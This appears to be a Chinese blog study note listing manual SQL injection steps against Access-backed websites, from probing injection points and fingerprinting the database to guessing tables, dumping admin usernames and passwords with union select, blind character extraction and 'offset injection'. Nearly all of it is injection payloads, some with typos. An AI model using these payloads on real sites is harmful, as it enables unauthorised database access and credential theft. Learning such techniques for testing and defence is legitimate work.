ACCESS手工注入学习笔记
ACCESS注入
一:判断注入点
‘ 报错
and 1=1 正确
and 1=2 报错
or 1=1 报错
or 1=2 正确
and 1=111
判断是否带入连接查询:返回正确的话带入连接查询。报错则不带入。
二:判断数据库类型
and exsits (select * from msysobjects) >0 ACCESS
and exsits (select * from sysobjects) >0 SQL server
三:判断数据库表
and exists(select * from admin) 判断存不存在这个表
四:判断字段名
and exists(select 猜测的字段名 from admin)
五:判断字段长度
order by 猜测的长度
六:报错
and 1=2 union select 1,2,3,4,5,6...,字段长度 from admin
例:报错3和5,将3和5改成admin和passwd爆出账号密码
七:判断账号密码的长度、内容
and (select len(字段名) from 表名)=猜测长度
and (select top 1 asc(mid(列名,第几位,1)) from 表名)=97 a
八:偏移注入
1、利用“*”代替admin表内存在的字段,从最后的字段开始逐步测试,直到返回正常。
2、基本公式:order by出的字段数减去*号的字段数,然后再用order by的字段数减去2倍刚才得出来的答案
3、union select 1,2,3,4,a.id,b.id,* from (sys_admin as a inner join sys_admin as b on a.id = b.id)
#这里union select 1,2,3,4 顾名思义就是基础公式得出来的长度。
ACCESS手工注入学习笔记相关推荐
- Access手工注入
access手工注入 哈哈哈哈,,,我顾北清又回来啦,接着更新. 实验环境:win2008R2虚拟机,物理机(也就是我的win10). 搭建环境用的是access+asp源码. 环境搭建可以参照这里, ...
- 探针一号的SQL注入学习笔记
SQL注入学习笔记 文章目录 SQL注入学习笔记 1.问题 2.sqlilabs环境配置 3.第一个注入过程详解(整型注入) 4.跨库注入 5.字符型注入 5.报错注入 6.POST和COOKIE请求 ...
- SQL手工注入网站笔记
SQL手工注入网站笔记 目标网站:http://testphp.vulnweb.com/listproducts.php?cat=1 1.判断注入点: http://testphp.vulnweb.c ...
- sql注入学习笔记(4)--sqlmap注入心得
其实也不算心得吧,只是一点小小的体会,抛砖引玉 怎么说呢,还是主要分享一下sql注入的思路,具体的操作还是要看网站了 第一步,注入点 sql注入点最好的寻找方式就是用google,可以经常去googl ...
- access手工注入笔记
http://www.xxx.com/news.asp?id=6 注入点 判断是否存在注入 两次返回不一样 存在注入 http://www.xxx.com/news.asp?id=6 and 1=1 ...
- sql注入 学习笔记
学习来源视频:https://www.bilibili.com/video/BV1HT411E7bH?p=1&vd_source=91ac068ef47e260a09856e8db81907c ...
- java sql objects_Java SQL注入学习笔记
1 简介 文章主要内容包括: Java 持久层技术/框架简单介绍 不同场景/框架下易导致 SQL 注入的写法 如何避免和修复 SQL 注入 2 JDBC 介绍 JDBC: 全称 Java Databa ...
- Java SQL注入学习笔记
1 简介 文章主要内容包括: Java 持久层技术/框架简单介绍 不同场景/框架下易导致 SQL 注入的写法 如何避免和修复 SQL 注入 2 JDBC 介绍 JDBC: 全称 Java Databa ...
- Java SQL 注入学习笔记
介绍 JDBC: 全称 Java Database Connectivity是 Java 访问数据库的 API,不依赖于特定数据库 ( database-independent )所有 Java 持久 ...
最新文章
- mysql存储过程参数可选,如何在T-SQL存储过程中使用可选参数?
- 炎热夏天到底如何让自己更凉快? - 生活至上,美容至尚!
- 独家 | 一文读懂概率论学习:贝叶斯理论(附链接)
- 关于使用mail命令产生:-bash: mail: command not found的解决方法
- Leetcode 113. 路径总和 II 解题思路及C++实现
- [云炬创业基础笔记]第七张创业团队测试3
- 文件系统损坏导致虚拟机无法正常启动的问题及解决方法
- vcode tsconfig.json 无故报错 -- 找不到任何输入
- fatal error C1083: 无法打开包括文件:“stdio.h
- 【大数据】分布式集群部署
- win7磁盘清理_为什么要清理磁盘碎片,win7电脑怎么清理磁盘碎片
- 计算机课设容易挂吗,数学差的学生避开这4大专业,挂科是常态,每年都有学生不能毕业...
- ProgressBar与Handler的整合应用
- PostgreSQL常用SQL
- bytes数组转string指定编码_好程序员Java学习路线分享Java基础之string
- kafka消息队列的概念理解
- [Hands-on Lab (2) - 使用Helm部署OpenShift应用
- Java8 Math新增方法
- 子过程或函数未定义_Power Pivotamp;Power BI DAX函数说明速查
- idesk卸载教程_iDesk助手使用帮助